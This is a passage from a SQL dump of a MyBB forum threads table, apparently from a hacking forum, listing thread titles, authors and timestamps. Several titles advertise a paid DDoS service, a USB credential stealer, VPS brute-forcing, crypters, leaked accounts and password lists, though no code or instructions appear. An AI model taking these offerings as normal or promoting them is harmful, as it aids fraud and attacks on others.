CAN WORK!!!!', '0', '0', '0', '1', 't3h jok3r', '1347170217', '1709', '1347170217', 't3h jok3r', '1', '19', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('366', '2', 'Testing SMTP Emailer', '0', '0', '0', '1', 't3h jok3r', '1347172849', '1710', '1347172953', 'Timmy', '5', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('367', '3', 'Please Read!', '0', '0', '0', '1', 't3h jok3r', '1347173438', '1713', '1347205769', 'iTzIpod', '82', '13', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('368', '47', '5 free @l33thacking.net forwarders', '0', '0', '0', '1', 't3h jok3r', '1347174018', '1714', '1347681035', 'Timmy', '5', '62', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('369', '55', 'Paypal 1 dollar 50cents', '0', '0', '0', '53', 'sirchamp', '1347182055', '1720', '1347481482', 'iTzIpod', '82', '28', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('370', '35', 'Basic L33THACKING logo (just an basic one)', '0', '0', '0', '172', 'MistaCode', '1347182680', '1721', '1347800288', 'iTzIpod', '82', '29', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('371', '7', 'How do I make an ICQ account?', '0', '0', '0', '20', 'JakeUS', '1347197111', '1723', '1347197111', 'JakeUS', '20', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('372', '3', 'Reputation', '0', '0', '0', '53', 'sirchamp', '1347206027', '1728', '1347234358', 't3h jok3r', '1', '14', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('373', '16', 'Cadburys (SE)', '0', '0', '0', '112', '??????Z', '1347209691', '1734', '1347328971', 'Timmy', '5', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('374', '19', '[Junk]PLEASE DELETE', '0', '0', '0', '62', 'R?????zo?', '1347212594', '1735', '1347249273', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('375', '30', 'Yahoo-ACC-Maker V.1.4', '0', '0', '0', '62', 'R?????zo?', '1347212649', '1736', '1347212649', 'R?????zo?', '62', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('376', '54', 'ExpressVPN codes', '0', '0', '0', '62', 'R?????zo?', '1347212894', '1738', '1349452950', 'R?????zo?', '62', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('377', '54', 'Netflix accounts', '0', '0', '0', '62', 'R?????zo?', '1347212944', '1739', '1347332586', 'iTzIpod', '82', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('383', '29', 'Paypal Withdrawy to cash or debit card [TUT DL]', '0', '0', '0', '112', '??????Z', '1347258711', '1765', '1347748728', 'Timmy', '5', '32', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('378', '7', 'How is school for you?', '0', '0', '0', '82', 'iTzIpod', '1347220183', '1742', '1347711866', 'iTzIpod', '82', '68', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('379', '34', 'Itachi\'s Intermediate Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1347226893', '1743', '1347226893', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('386', '24', 'Rar Password Unlocker v2.1', '0', '0', '0', '5', 'Timmy', '1347328500', '1772', '1347328500', 'Timmy', '5', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('380', '34', 'Simple Signature Tutorial', '0', '0', '0', '82', 'iTzIpod', '1347230245', '1746', '1348457568', 'iTzIpod', '82', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('381', '3', 'Server Error', '0', '0', '0', '82', 'iTzIpod', '1347233155', '1747', '1347234400', 't3h jok3r', '1', '11', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('393', '55', 'someone can crypt my server?', '0', '0', '0', '62', 'R?????zo?', '1347453303', '1834', '1347453303', 'R?????zo?', '62', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('390', '35', 'Which Photoshop version do you use?', '0', '0', '0', '82', 'iTzIpod', '1347365768', '1796', '1348831964', 'iTzIpod', '82', '21', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('382', '43', '[file ice]4 windows 8 keys', '0', '0', '0', '1', 't3h jok3r', '1347247699', '1760', '1347247699', 't3h jok3r', '1', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('384', '55', 'Booter Shells', '0', '0', '0', '67', 'HoverCatz', '1347299119', '1767', '1347327508', 'Timmy', '5', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('385', '19', '[Junk][Important] Discussion', '0', '0', '0', '82', 'iTzIpod', '1347305265', '1768', '1349127861', 'iTzIpod', '82', '49', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('387', '24', 'Good add ons on your computer.. Best upgrades on old computers', '0', '0', '0', '5', 'Timmy', '1347328926', '1775', '1347328926', 'Timmy', '5', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('388', '52', 'Request for the coders group', '0', '0', '0', '7', 'Romdu62', '1347329794', '1781', '1347936396', 'Romdu62', '7', '62', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('389', '49', '[Suggestion] GFX Request Section', '0', '0', '0', '82', 'iTzIpod', '1347362908', '1794', '1347465866', 't3h jok3r', '1', '14', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('391', '3', 'Demoted', '0', '0', '0', '20', 'JakeUS', '1347411541', '1815', '1347493854', 'JakeUS', '20', '29', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('392', '9', 'PPD Niches', '0', '0', '0', '61', 'NXK', '1347411949', '1816', '1349874577', 'VirtualLegend', '228', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('394', '3', '[Bug] Username linking to profile', '0', '0', '0', '82', 'iTzIpod', '1347478573', '1844', '1347491015', 't3h jok3r', '1', '14', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('395', '9', 'Make 150+ a Day - Easy Blackhat Method!', '0', '0', '0', '1', 't3h jok3r', '1347484179', '1850', '1347484179', 't3h jok3r', '1', '11', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('399', '3', '[Bug] Error', '0', '0', '0', '82', 'iTzIpod', '1347537342', '1869', '1347593566', 't3h jok3r', '1', '14', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('397', '42', '11th Anniversary of 9/11', '0', '0', '0', '82', 'iTzIpod', '1347494305', '1859', '1347711217', 'iTzIpod', '82', '15', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('398', '21', '[Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$5/Hour]', '0', '0', '0', '100', '??zg???g????61', '1347497923', '1860', '1352518368', 'Triple H', '4', '172', '24', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('400', '59', 'Free Pizza method', '0', '0', '0', '61', 'NXK', '1347568353', '1880', '1347590168', 'iTzIpod', '82', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('401', '12', 'How to get a free skype resolver with working numbers !', '0', '0', '0', '82', 'iTzIpod', '1347570604', '1881', '1347632962', 'iTzIpod', '82', '26', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('422', '19', '[Junk][Read] Announcement', '0', '0', '0', '82', 'iTzIpod', '1347634256', '1936', '1349127796', 'iTzIpod', '82', '17', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('403', '18', 'Youtube Bot', '0', '0', '0', '82', 'iTzIpod', '1347571098', '1883', '1347910368', 'iTzIpod', '82', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('404', '30', 'Sony Vegas Pro 11.0 & After Effects', '0', '0', '0', '82', 'iTzIpod', '1347571259', '1884', '1347628346', 'iTzIpod', '82', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('405', '29', 'Adf.ly Mass Clicking Bot', '0', '0', '0', '82', 'iTzIpod', '1347571418', '1885', '1348274999', 'Timmy', '5', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('406', '30', 'Skype Fake Quote Generator', '0', '0', '0', '82', 'iTzIpod', '1347571538', '1886', '1347681912', 'iTzIpod', '82', '10', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('407', '29', 'Instagram Bot [Mass Like]', '0', '0', '0', '82', 'iTzIpod', '1347571650', '1887', '1347586424', 'iTzIpod', '82', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('408', '30', 'Hotmail Account Creator', '0', '0', '0', '82', 'iTzIpod', '1347571776', '1888', '1347571776', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('409', '30', '[Full] Forum Poster 3.30', '0', '0', '0', '82', 'iTzIpod', '1347571952', '1889', '1348011785', 'iTzIpod', '82', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('410', '30', 'Enhance Views Credits Booster', '0', '0', '0', '82', 'iTzIpod', '1347572179', '1890', '1349875002', 'sirchamp', '53', '19', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('411', '30', 'Enhance Views Booster', '0', '0', '0', '82', 'iTzIpod', '1347572348', '1891', '1347572348', 'iTzIpod', '82', '9', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('412', '7', '400th Thread', '0', '0', '0', '82', 'iTzIpod', '1347572744', '1892', '1347711707', 'iTzIpod', '82', '18', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('413', '29', 'EARN $50/HOUR EASILY', '0', '0', '0', '82', 'iTzIpod', '1347586825', '1899', '1350854570', 'VirtualLegend', '228', '30', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('414', '29', 'Maximize Profits Using Google Adsense', '0', '0', '0', '82', 'iTzIpod', '1347587006', '1900', '1348278205', 'iTzIpod', '82', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('415', '59', '2000+ eBooks', '0', '0', '0', '82', 'iTzIpod', '1347587134', '1901', '1347587134', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('416', '29', 'Earn Money from Captcha', '0', '0', '0', '82', 'iTzIpod', '1347587730', '1902', '1347628295', 'iTzIpod', '82', '14', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('417', '4', 'HI!', '0', '6', '0', '184', 'Homeless', '1347595892', '1911', '1347676924', 'p420', '9', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('418', '16', '[eBook][Special] iTzIpod\'s SEing Tutorial', '0', '0', '0', '82', 'iTzIpod', '1347630216', '1925', '1352597515', 'iTzIpod', '82', '66', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('419', '49', '[Suggestion] Signature Characters + for + Members', '0', '0', '0', '82', 'iTzIpod', '1347630708', '1926', '1347663878', 't3h jok3r', '1', '7', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('420', '49', '[Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '0', '0', '82', 'iTzIpod', '1347631082', '1927', '1347683927', 't3h jok3r', '1', '15', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('421', '49', '[Suggestion] Upgraded Members get no waiting time', '0', '0', '0', '82', 'iTzIpod', '1347631417', '1929', '1347664130', 't3h jok3r', '1', '13', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('423', '9', 'Earn money by Copy & Pasting', '0', '0', '0', '82', 'iTzIpod', '1347636154', '1937', '1347912711', 'iTzIpod', '82', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('424', '61', 'Money Making eBooks', '0', '0', '0', '82', 'iTzIpod', '1347636203', '1938', '1347678166', 'iTzIpod', '82', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('425', '61', 'Huge SEing Giveaway [50+]', '0', '0', '0', '82', 'iTzIpod', '1347636332', '1939', '1347717416', 'iTzIpod', '82', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('426', '30', '[100% Virus Free] Photoshop CS5', '0', '0', '0', '82', 'iTzIpod', '1347636446', '1940', '1352551193', 'iTzIpod', '82', '24', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('427', '61', 'Photoshop CS6 Extended 64 Bit', '0', '0', '0', '82', 'iTzIpod', '1347636588', '1941', '1347717463', 'iTzIpod', '82', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('428', '74', 'Dark Steam | Free Steam Games', '0', '0', '0', '82', 'iTzIpod', '1347636703', '1942', '1350157556', 'iTzIpod', '82', '34', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('435', '4', 'Newbie Here', '0', '0', '0', '188', 'Lonnie', '1347666181', '1984', '1347927900', 'JakeUS', '20', '29', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('429', '2', 'testing similes', '0', '0', '0', '1', 't3h jok3r', '1347647241', '1949', '1347647280', 't3h jok3r', '1', '4', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('430', '9', '? ?[3$]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '0', '0', '53', 'sirchamp', '1347647305', '1951', '1347890940', 'NXK', '61', '30', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('432', '61', '145+ eBooks Giveaway', '0', '0', '0', '82', 'iTzIpod', '1347654427', '1968', '1347678235', 'iTzIpod', '82', '11', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('431', '61', '[Free] R?????zo?\'s GFX Service', '0', '0', '0', '62', 'R?????zo?', '1347649952', '1957', '1350905653', 'R?????zo?', '62', '357', '69', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('433', '61', '2000+ eBooks Giveaway', '0', '0', '0', '82', 'iTzIpod', '1347654511', '1969', '1347717539', 'iTzIpod', '82', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('438', '13', 'Stay Anonymous (Secure) online 2012 Using SSH Tunneling', '0', '0', '0', '9', 'p420', '1347677781', '2012', '1347852970', 'Timmy', '5', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('434', '61', 'Money Making eBook', '0', '0', '0', '82', 'iTzIpod', '1347664759', '1981', '1347711613', 'iTzIpod', '82', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('436', '7', 'Motivation', '0', '0', '0', '82', 'iTzIpod', '1347671765', '1988', '1347936130', 'Timmy', '5', '29', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('437', '3', 'Help keep LH up', '0', '0', '0', '1', 't3h jok3r', '1347676177', '1995', '1347935598', 't3h jok3r', '1', '60', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('447', '7', '2000 Posts', '0', '0', '0', '82', 'iTzIpod', '1347718314', '2070', '1347743409', 'iTzIpod', '82', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('439', '58', 'Unique - Recruitment', '0', '0', '0', '82', 'iTzIpod', '1347712290', '2051', '1349834528', 't3h jok3r', '1', '145', '28', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('440', '74', '1300+ Runescape Accounts', '0', '0', '0', '82', 'iTzIpod', '1347712831', '2052', '1347712831', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('441', '61', 'Adf.ly Bot + Adfoc.us Bot', '0', '0', '0', '82', 'iTzIpod', '1347712953', '2053', '1347985874', 't3h jok3r', '1', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('442', '42', 'Giant Solar Flare set to hit Earth in 2013', '0', '0', '0', '82', 'iTzIpod', '1347713327', '2054', '1347937476', 't3h jok3r', '1', '9', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('443', '42', 'Apple Announces the iPhone 5', '0', '0', '0', '82', 'iTzIpod', '1347713405', '2055', '1349783025', 'mothered', '205', '47', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('444', '61', '[eBook] How to get stuff on eBay for Free', '0', '0', '0', '82', 'iTzIpod', '1347713716', '2056', '1347713716', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('445', '61', '[eBook] Adf.ly Money Making Machine', '0', '0', '0', '82', 'iTzIpod', '1347713946', '2057', '1347713946', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('446', '28', 'This forum is dead..', '0', '0', '0', '82', 'iTzIpod', '1347716846', '2058', '1349553268', 'iTzIpod', '82', '84', '19', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('448', '61', 'Broken Links', '0', '0', '0', '82', 'iTzIpod', '1347720178', '2073', '1347741724', 'iTzIpod', '82', '11', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('449', '35', 'Kratos God Of War Signature/Tag', '0', '0', '0', '82', 'iTzIpod', '1347720779', '2074', '1348888995', 'Apathy', '2', '26', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('450', '20', 'Anyone got a good crypter?', '0', '0', '0', '5', 'Timmy', '1347749482', '2110', '1347778564', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('451', '19', '[Junk][Junk][Recently Created]Free working shell booter', '0', '0', '0', '5', 'Timmy', '1347749580', '2111', '1349761011', 't3h jok3r', '1', '18', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('464', '12', '[TUT] FUD USB Stealer by Anonymous Hackers', '0', '0', '0', '10', 'swa4567', '1347851698', '2192', '1348680507', 'Timmy', '5', '20', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('452', '29', '[EASY] ??How To Get $20+ Checks From Hershey\'s!??[eBook]', '0', '0', '0', '172', 'MistaCode', '1347792841', '2121', '1349304215', '??zg???g????61', '100', '25', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('454', '35', 'L33THacking Logo attempt 2', '0', '0', '0', '172', 'MistaCode', '1347811140', '2139', '1349490556', 'Exposé', '222', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('453', '19', '[Junk]Instagram Bot 3.2', '0', '0', '0', '82', 'iTzIpod', '1347800106', '2129', '1349127640', 'iTzIpod', '82', '3', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('455', '29', 'CPA Twister 1.3 by sonex [FREE]', '0', '0', '0', '172', 'MistaCode', '1347812651', '2147', '1347812651', 'MistaCode', '172', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('456', '29', 'Galaxian PPD Method v2 [Free]', '0', '0', '0', '172', 'MistaCode', '1347812738', '2148', '1347812738', 'MistaCode', '172', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('457', '29', 'Get free Alienware Laptops [Secret Loophole of Dell Revealed](Limited Edition)', '0', '0', '0', '172', 'MistaCode', '1347812885', '2149', '1350802060', 'XxTREYZxX', '257', '32', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('458', '29', 'How to get 26 months free of xbox live membership', '0', '0', '0', '172', 'MistaCode', '1347813005', '2150', '1347813005', 'MistaCode', '172', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('459', '29', 'Affiliate Marketing [Price: 8$]', '0', '0', '0', '172', 'MistaCode', '1347813077', '2151', '1350802145', 'XxTREYZxX', '257', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('461', '43', 'some PID\'s List', '0', '0', '0', '62', 'R?????zo?', '1347825758', '2171', '1347909980', 'iTzIpod', '82', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('460', '34', 'R?????zo?\'s font pack, 1500+ [FREE]', '0', '0', '0', '62', 'R?????zo?', '1347817644', '2159', '1347825403', 'iTzIpod', '82', '12', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('462', '35', 'Vote for LHs new logo', '0', '0', '2', '1', 't3h jok3r', '1347848243', '2181', '1348108388', 'Slender Man', '194', '75', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('463', '20', '[VB.NET]Free Encrypters Algothrims Codes AER256 - OKTO3 & MORE...', '0', '0', '0', '7', 'Romdu62', '1347849885', '2186', '1347849885', 'Romdu62', '7', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('465', '11', 'What is ewhoring', '0', '0', '0', '10', 'swa4567', '1347851832', '2194', '1348275387', 'Timmy', '5', '32', '3', '0', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('466', '13', 'How to BruteForce a VPS!', '0', '0', '0', '5', 'Timmy', '1347853035', '2201', '1349233348', 'Timmy', '5', '24', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('467', '44', 'Bestbuy PSD', '0', '0', '0', '5', 'Timmy', '1347853327', '2203', '1351917217', 'Timmy', '5', '14', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('468', '16', '[TUT] Free Dre Beats [Unconfirmed]', '0', '0', '0', '5', 'Timmy', '1347853534', '2204', '1347935799', 'Timmy', '5', '12', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('469', '3', '[Announcement]Going to clear up all the PMs on board', '0', '0', '0', '1', 't3h jok3r', '1347856289', '2210', '1347938745', 't3h jok3r', '1', '19', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('470', '14', '[SHITLOAD][FRESH]Free proxy list', '0', '0', '0', '4', 'Triple H', '1347856939', '2211', '1347941431', 't3h jok3r', '1', '20', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('471', '7', 'L33THackers is not L33THacking', '0', '0', '0', '1', 't3h jok3r', '1347857603', '2212', '1347910914', 'iTzIpod', '82', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('473', '7', '1 Week within 1 Month', '0', '0', '0', '82', 'iTzIpod', '1347916175', '2252', '1347924039', 'iTzIpod', '82', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('472', '7', 'School story', '0', '0', '0', '61', 'NXK', '1347892813', '2221', '1348106640', 'iTzIpod', '82', '55', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('474', '25', 'What antivirus you have?', '0', '0', '0', '7', 'Romdu62', '1347936563', '2287', '1348617350', 'Romdu62', '7', '18', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('475', '7', '500 posts', '0', '0', '0', '1', 't3h jok3r', '1348011635', '2318', '1348023834', 't3h jok3r', '1', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('476', '19', '[Junk][Junk][Announcement] t3h jok3r might be inactive', '0', '0', '0', '82', 'iTzIpod', '1348015750', '2322', '1348018009', 't3h jok3r', '1', '4', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('477', '19', '[Junk]Jok3r is going..', '0', '0', '0', '1', 't3h jok3r', '1348018219', '2325', '1348367868', 't3h jok3r', '1', '14', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('478', '7', 'The Hunger Games', '0', '0', '0', '82', 'iTzIpod', '1348020369', '2328', '1348097453', 'iTzIpod', '82', '9', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('479', '49', '[Suggestion] Forum Logo resized', '0', '0', '0', '82', 'iTzIpod', '1348022509', '2329', '1349147323', 't3h jok3r', '1', '18', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('480', '15', 'Windows 7 anytime upgrader keygen', '0', '0', '0', '2', 'Apathy', '1348025423', '2334', '1348025423', 'Apathy', '2', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('481', '74', 'Runescape Accounts', '0', '0', '0', '82', 'iTzIpod', '1348085646', '2342', '1350113941', 'XxTREYZxX', '257', '14', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('482', '61', '3 Million Password List', '0', '0', '0', '82', 'iTzIpod', '1348085780', '2343', '1349052186', 'iTzIpod', '82', '6', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('483', '61', '[eBook] How to succeed in Adf.ly/Adfoc.us', '0', '0', '0', '82', 'iTzIpod', '1348086159', '2344', '1348086159', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('484', '4', 'Slender Man here.', '0', '0', '0', '194', 'Slender Man', '1348093029', '2345', '1348497659', 'NXK', '61', '22', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('485', '19', '[Junk][?] Switching Userbars?', '0', '0', '0', '82', 'iTzIpod', '1348104186', '2352', '1349127861', 'iTzIpod', '82', '13', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('486', '56', 'Guess how many?', '0', '0', '0', '82', 'iTzIpod', '1348105597', '2353', '1350068512', 'GlowingCapes', '253', '16', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('487', '56', 'Corrupt a wish', '0', '0', '0', '82', 'iTzIpod', '1348105845', '2354', '1352597674', 'iTzIpod', '82', '112', '40', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('488', '8', 'What are you listening to?', '0', '0', '0', '82', 'iTzIpod', '1348106004', '2355', '1349538068', 'Exposé', '222', '40', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('489', '8', 'What are your favorite lyrics?', '0', '0', '0', '82', 'iTzIpod', '1348106137', '2356', '1348111389', 'Slender Man', '194', '6', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('490', '49', 'Forum Suggestion', '0', '0', '0', '194', 'Slender Man', '1348110073', '2381', '1349147246', 't3h jok3r', '1', '75', '20', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('491', '8', 'Free Album!', '0', '0', '0', '194', 'Slender Man', '1348111300', '2383', '1348140927', 'iTzIpod', '82', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('492', '7', 'Where do you guys live? (BigPictures!!)', '0', '0', '0', '53', 'sirchamp', '1348145412', '2395', '1348241010', 'NXK', '61', '36', 